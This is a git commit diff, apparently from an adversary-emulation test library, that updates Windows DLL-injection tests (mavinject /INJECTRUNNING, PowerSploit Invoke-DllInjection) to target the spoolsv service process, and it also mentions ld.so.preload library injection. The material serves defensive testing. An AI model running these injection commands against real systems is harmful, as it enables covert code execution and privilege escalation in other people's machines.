Generate docs from job=validate_atomics_generate_docs branch=master
This commit is contained in:
parent
e93ed496ac
commit
ddadfbb3bf
@@ -50,11 +50,12 @@ Windows 10 Utility To Inject DLLS
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055\src\x64\T1055.dll|
|
||||
| process_id | PID of input_arguments | Int | $pid|
|
||||
| process_id | PID of input_arguments | Int | (get-process spoolsv).id|
|
||||
|
||||
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
|
||||
```
|
||||
mavinject #{process_id} /INJECTRUNNING #{dll_payload}
|
||||
$mypid = #{process_id}
|
||||
mavinject $mypid /INJECTRUNNING #{dll_payload}
|
||||
```
|
||||
|
||||
|
||||
@@ -72,11 +73,12 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| dll_payload | DLL to Inject | Path | T1055.dll|
|
||||
| process_id | PID of input_arguments | Int | $pid|
|
||||
| process_id | PID of input_arguments | Int | (get-process spoolsv).id|
|
||||
|
||||
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
|
||||
```
|
||||
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
|
||||
$mypid = #{process_id}
|
||||
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
|
||||
```
|
||||
|
||||
|
||||
@@ -85,7 +87,7 @@ Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload
|
||||
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
|
||||
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
+20
-22
@@ -9640,13 +9640,13 @@ defense-evasion:
|
||||
process_id:
|
||||
description: PID of input_arguments
|
||||
type: Int
|
||||
default: "$pid"
|
||||
default: "(get-process spoolsv).id"
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
command: 'mavinject #{process_id} /INJECTRUNNING #{dll_payload}
|
||||
|
||||
'
|
||||
command: |
|
||||
$mypid = #{process_id}
|
||||
mavinject $mypid /INJECTRUNNING #{dll_payload}
|
||||
- name: Process Injection via PowerSploit
|
||||
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
|
||||
|
||||
@@ -9661,19 +9661,18 @@ defense-evasion:
|
||||
process_id:
|
||||
description: PID of input_arguments
|
||||
type: Int
|
||||
default: "$pid"
|
||||
default: "(get-process spoolsv).id"
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
command: 'Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
|
||||
|
||||
'
|
||||
command: |
|
||||
$mypid = #{process_id}
|
||||
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
|
||||
- name: Shared Library Injection via /etc/ld.so.preload
|
||||
description: 'This test adds a shared library to the `ld.so.preload` list to
|
||||
description: "This test adds a shared library to the `ld.so.preload` list to
|
||||
execute and intercept API calls. This technique was used by threat actor Rocke
|
||||
during the exploitation of Linux web servers. This requires the `glibc` package.
|
||||
|
||||
'
|
||||
\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
@@ -13005,13 +13004,13 @@ privilege-escalation:
|
||||
process_id:
|
||||
description: PID of input_arguments
|
||||
type: Int
|
||||
default: "$pid"
|
||||
default: "(get-process spoolsv).id"
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
command: 'mavinject #{process_id} /INJECTRUNNING #{dll_payload}
|
||||
|
||||
'
|
||||
command: |
|
||||
$mypid = #{process_id}
|
||||
mavinject $mypid /INJECTRUNNING #{dll_payload}
|
||||
- name: Process Injection via PowerSploit
|
||||
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
|
||||
|
||||
@@ -13026,19 +13025,18 @@ privilege-escalation:
|
||||
process_id:
|
||||
description: PID of input_arguments
|
||||
type: Int
|
||||
default: "$pid"
|
||||
default: "(get-process spoolsv).id"
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
command: 'Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
|
||||
|
||||
'
|
||||
command: |
|
||||
$mypid = #{process_id}
|
||||
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
|
||||
- name: Shared Library Injection via /etc/ld.so.preload
|
||||
description: 'This test adds a shared library to the `ld.so.preload` list to
|
||||
description: "This test adds a shared library to the `ld.so.preload` list to
|
||||
execute and intercept API calls. This technique was used by threat actor Rocke
|
||||
during the exploitation of Linux web servers. This requires the `glibc` package.
|
||||
|
||||
'
|
||||
\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
|
||||